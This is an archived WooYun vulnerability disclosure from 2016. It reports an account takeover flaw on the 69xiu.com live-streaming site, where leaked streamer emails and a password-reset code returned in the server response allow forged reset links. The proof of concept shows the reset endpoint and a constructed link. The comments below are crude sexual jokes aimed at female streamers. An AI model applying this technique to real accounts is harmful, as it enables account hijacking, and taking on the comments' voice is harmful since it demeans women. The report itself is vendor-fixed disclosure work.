破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

69秀(玖秀)可上女主播的账号

编号215398
Urlhttp://www.wooyun.org/bug.php?action=view&id=215398
漏洞状态厂商已经修复
漏洞标题69秀(玖秀)可上女主播的账号
漏洞类型设计缺陷/逻辑错误
厂商69xiu.com
白帽子getshell1993
提交日期2016-06-06 15:11:00
公开日期2016-06-07 15:32:00
修复时间2016-06-07 15:32:00
确认时间2016-06-07 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank18
漏洞简介
在她直播的时候可以上了她 的 账号!
漏洞细节

http://www.69xiu.com/rank
拿主站一个正在直播的女主播演示一下

1.jpg


进入直播页面

2.jpg


可以看到妹子正在卖力的直播中,个人页面存在信息泄露,可获取到主播的邮箱地址

3.jpg


email":"[email protected]

4.jpg


密码找回的功能也存在信息泄露,可利用邮箱重置密码(为了不影响厂商业务,犹豫了一下还是拿我自己的演示吧)

POC

http://www.69xiu.com/my/checkemail/findpwd/
输入邮箱找回密码

5.jpg


6.jpg


可以看到只要知道code就能构造重置链接
response这里又泄露了

7.jpg


8.jpg


当然 女主播的也一样

9.jpg


is_findpwd_email=a:4:{s:8:"sendtime";i:1464837456;s:6:"verify";s:32:"9d591fd9e63ce54529f589c27c4e4357";s:5:"email";s:17:"[email protected]";s:6:"mobile";s:0:"";};
http://www.69xiu.com/my/checkemail/isfindpwd/?code=9d591fd9e63ce54529f589c27c4e4357

10.jpg


所以,在她直播的时候可以上了她 的 账号
就不进一步演示了。。。
还有好多女主播,列举几个

MPT.Config("objRid", 71094697);
MPT.Config("objArtist", {"baseInfo":{"uid":"19971567","nickname":"\u51ef\u6492\u5927\u5e1d111","sex":"2","email":"[email protected]
MPT.Config("objRid", 71096441);
MPT.Config("objArtist", {"baseInfo":{"uid":"19972437","nickname":"AK\u4e36 \u7cd6\u679c","sex":"2","email":"[email protected]"
MPT.Config("objRid", 71074401);
MPT.Config("objArtist", {"baseInfo":{"uid":"19961505","nickname":"\u70ed\u821e\u8587\u513f\u65b0\u4eba\u6c42","sex":"2","email":"[email protected]"

修复方案

email/code别返回

状态信息 2016-06-06: 细节已通知厂商并且等待厂商处理中
2016-06-07: 厂商已经确认,细节仅向厂商公开
2016-06-07: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复漏洞已修复,高兴您对69秀的关注!
回应信息危害等级:高漏洞Rank:18 确认时间:2016-06-07 15:12
Showing 1-20 of 20 items.
评论内容评论人点赞数评论时间

来个社工女主播看看,上她

jackyu02016-06-07 15:50:00

我看到标题马上就进来了,因为我预料到会有类似上面的各种回复

库日天02016-06-07 15:43:00

69 可上女主播 真邪恶~

tSt02016-06-07 15:29:00

可上女主播。。。。。。。

欧冠狂魔阿森纳02016-06-06 16:50:00

我看到标题马上就进来了,因为我预料到会有类似上面的各种回复

红客十年02016-06-06 16:05:00

69怎么秀?

Hancock02016-06-06 16:01:00

看到标题,表示已滑!

小威02016-06-06 15:42:00

求洞主直播上女主播

hecate02016-06-06 15:34:00

69 可上女主播 真邪恶~

px162402016-06-06 15:25:00

我又被标题骗进来了

爱偷懒的9802016-06-06 15:16:00

出于礼貌,我撸了一发

HackBraid02016-06-06 15:15:00

@wefgod 我也是,wefgod大牛你又出现了。

不能忍02016-06-06 15:14:00

我看到标题马上就进来了,因为我预料到会有类似上面的各种回复

wefgod02016-06-03 15:25:00

这姿势不错

浮萍02016-06-03 10:03:00

女主播直播时候 上 了她 的账号,出现一个抠脚大汉,多名观众当场流下残疾

立志成为厨神的男人02016-06-03 09:58:00

第一眼看成了可上女主播

90Snake02016-06-03 08:58:00

把‘的帐号’去掉,我就收藏这个漏洞

白非白02016-06-02 23:10:00

69

小川02016-06-02 23:01:00

上她?

Explo1t02016-06-02 22:54:00

上了她帐号有什么意思?上她 才有意思

邪少02016-06-02 21:50:00